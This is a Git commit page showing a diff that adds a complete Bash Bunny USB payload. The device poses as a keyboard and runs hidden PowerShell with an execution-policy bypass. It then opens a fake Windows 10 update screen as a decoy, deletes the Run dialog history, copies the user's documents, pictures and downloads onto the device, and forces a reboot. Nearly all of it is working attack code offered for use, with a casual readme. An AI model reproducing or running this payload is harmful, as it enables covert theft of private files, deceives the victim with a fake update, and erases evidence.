hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/469/head
0iphor13 2021-10-01 11:50:10 +02:00 committed by GitHub
parent 4627e1795b ee97a0820d
commit 7916247ac0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 99 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
payloads/library/exfiltration/USB_Exfil_with_Fake_Update _and_force-reboot/i.vbs Normal file
View File

@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

9
payloads/library/exfiltration/USB_Exfil_with_Fake_Update _and_force-reboot/payload.txt Normal file
View File

@ -0,0 +1,9 @@
# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs, closes ExplorerWindow after mounting and sets MSEdge in Fullscreen
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
QUACK ALT F4
RUN WIN powershell -WindowStyle hidden -exec bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
Q DELAY 2000
Q F11
LED FINISH

33
payloads/library/exfiltration/USB_Exfil_with_Fake_Update _and_force-reboot/readme.md Normal file
View File

@ -0,0 +1,33 @@
# Fake Win10 Update Extractor based on Simple USB File Extractor by DanTheGoodman
---
- Author: HackingMark
- Creds: thehappydinoa, sebkinne, DanTheGoodman
### Description
---
A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/USB-Exfiltration/Computername-Date` folder. Also deletes the run-line history because why not. At the start of the Copy Process a Fake Windows10 Update screen shows up and if all files are copied there is a forced reboot.
### BashBunny MK II
If you are using a SD-Card for Exfiltration, you should copy the Payload folder on it. X.cmd must be presented in the /Payloads/§Switch/ folder.
### Dependencies
---
None :)
### Configuration (optional)
---
By default the payload is set to pull all .jpg, .txt, .pdf and .docx files from the Desktop, Downloads, and Documents folders and the full Picture folder. You can add new items/locations by making new xcopy lines in the x.cmd file.
### Status:
---
|LED|Status|
|---|---|
|Yellow single blink|Running payload|
|Solid Green|Payload executed|
---
All files are copied when the PC reboots. Have fun ;)

53
payloads/library/exfiltration/USB_Exfil_with_Fake_Update _and_force-reboot/x.cmd Normal file
View File

@ -0,0 +1,53 @@
@echo on
@echo Installing Windows Update
REM start fake Update
start msedge -fullscreen http://fakeupdate.net/win10/index.html
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Set the location
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM Add more of the line below specifying the location and file type
REM The below example grabs all .pdf files from the user's documents folder
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.jpg %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.docx %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.txt %dst% >>nul
)
if Exist %USERPROFILE%\Desktop (
xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.docx %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.txt %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.jpg %dst% >>nul
)
if Exist %USERPROFILE%\Pictures (
xcopy /C /Q /G /Y /E %USERPROFILE%\Pictures\ %dst% >>nul
)
if Exist %USERPROFILE%\Downloads (
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.txt %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.jpg %dst% >>nul
)
REM Force Restart
Shutdown -r -f -t 00
@cls
@exit

3
payloads/library/exfiltration/USB_Exfil_with_Fake_Update _and_force-reboot/z.cmd Normal file
View File

@ -0,0 +1,3 @@
@echo off
cscript %~dp0\i.vbs %~dp0\x.cmd
@exit